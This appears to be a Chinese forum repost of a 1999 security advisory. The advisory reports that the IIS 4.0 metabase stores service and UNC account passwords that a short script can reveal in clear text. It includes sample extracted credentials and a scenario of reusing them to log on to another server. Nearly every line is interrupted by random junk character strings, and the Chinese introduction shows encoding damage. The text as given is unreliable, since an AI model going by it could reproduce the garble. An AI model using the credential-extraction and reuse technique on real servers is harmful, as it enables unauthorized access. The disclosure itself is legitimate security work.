NT的密碼究竟放在哪

根據(jù)以前的發(fā)現(xiàn),windowsNT密碼雖然不象Windows95那樣以簡(jiǎn)單加密形式包含在一個(gè)文件里面,而是一些雜亂的暗碼,分別藏在7個(gè)不同的地方。這篇最新發(fā)表的文章告訴我們WindowsNT密碼隱藏的第八個(gè)地方。Date: Mon, 22 Feb 1999 11:26:41 +0100
* c7 T" E- `2 g- I! ?8 c/ _
, v( `& j- S0 C8 [% C+ ~) B/ KFrom: Patrick CHAMBET <pchambet@club-internet.fr>
* U7 Y/ N# i) M2 u, r
To: sans@clark.net
Subject: Alert: IIS 4.0 metabase can reveal plaintext passwords
! a% m7 M" N) b: A4 U6 E8 h$ M2 GHi all,
We knew that Windows NT passwords are stored in 7 different places across
: o6 ]4 x8 k  l4 Y0 a; J6 o+ vthe system. Here is a 8th place: the IIS 4.0 metabase.
1 r- E8 ?( h+ `4 v+ }5 w( m9 {3 }IIS 4.0 uses its own configuration database, named "metabase", which can
be compared to the Windows Registry: the metabase is organised in Hives,
3 w* A. n7 c9 L2 C: q9 zKeys and Values. It is stored in the following file:
C:\WINNT\system32\inetsrv\MetaBase.bin
- p5 Y! N  _. ]/ s4 l4 oThe IIS 4.0 metabase contains these passwords:
- IUSR_ComputerName account password (only if you have typed it in the
0 e! Z: q& \  U, EMMC)
# o/ V+ h& p* |& k4 l- IWAM_ComputerName account password (ALWAYS !)
- UNC username and password used to connect to another server if one of
7 x9 B! q& |) P  k. `) ?your virtual directories is located there.
% c0 h8 H+ \6 E% @4 \2 }0 y3 t7 w- The user name and password used to connect to the ODBC DSN called
"HTTPLOG" (if you chose to store your Logs into a database).
6 {4 Y( ]; n& @$ P$ `# L( v  R6 YNote that the usernames are in unicode, clear text, that the passwords are
srambled in the metabase.ini file, and that only Administrators and SYSTEM
& T  x& a0 B' n- N+ ehave permissions on this file.
7 T6 Z: ~+ k9 R6 R  ?/ V  d' c0 ]BUT a few lines of script in a WSH script or in an ASP page allow to print
these passwords in CLEAR TEXT.
1 Q- |! n7 X3 i% yThe user name and password used to connect to the Logs DSN could allow a
( r: t9 H) A0 u" |' W+ f" @malicious user to delete traces of his activities on the server.
Obviously this represents a significant risk for Web servers that allow
) U. e1 G2 y+ T. Alogons and/or remote access, although I did not see any exploit of the
problem I am reporting yet. Here is an example of what can be gathered:
) w$ @9 C3 d$ L0 N% P"
IIS 4.0 Metabase
& @/ }* _( b0 J  u, h! k?Patrick Chambet 1998 - pchambet@club-internet.fr
--- UNC User ---
: V' [1 L3 X, ~  c/ f3 ]# CUNC User name: 'Lou'
UNC User password: 'Microsoft'
UNC Authentication Pass Through: 'False'
( g6 u! k" b- [# b5 ?! k  e& b--- Anonymous User ---
2 y- N& }' z& ?3 QAnonymous User name: 'IUSR_SERVER'
Anonymous User password: 'x1fj5h_iopNNsp'
1 A) J4 [% K: u4 uPassword synchronization: 'False'
2 X5 H/ z3 R7 L--- IIS Logs DSN User ---
ODBC DSN name: 'HTTPLOG'
1 Y' X& X  `2 c1 Q5 ]" hODBC table name: 'InternetLog'
ODBC User name: 'InternetAdmin'
ODBC User password: 'xxxxxx'
--- Web Applications User ---
WAM User name: 'IWAM_SERVER'
WAM User password: 'Aj8_g2sAhjlk2'
* M( y3 V( K5 G, VDefault Logon Domain: ''
"
For example, you can imagine the following scenario:
A user Bob is allowed to logon only on a server hosting IIS 4.0, say
7 j7 Y) T, @: l2 ]6 eserver (a). He need not to be an Administrator. He can be for example
: g3 n2 g0 c* ~( I: ian IIS 4.0 Web Site Operator. Then, he launches a WSH script that extracts
. g; {( k, `) T3 K+ Bthe login name and password of the account used to access to a virtual
- a% Q6 u0 o" F! U4 ?3 _; f/ ?3 Kdirectory located on another server, say (b).
8 Q9 J9 S" t9 |! {7 WNow, Bob can use these login name and passord to logon on server (b).
$ D6 H. i/ Y0 u+ Y( vAnd so forth...
# r" {1 B5 z+ t$ g' [& rMicrosoft was informed of this vulnerability.
, R3 o' H" h; V# m% O% b1 b8 s9 Y_______________________________________________________________________
Patrick CHAMBET - pchambet@club-internet.fr
MCP NT 4.0
Internet, Security and Microsoft solutions
3 J2 W* D( h$ Re-business Services
3 j. J" R& E0 B( \( F% u5 JIBM Global Services
# k  e& ^& H0 K" v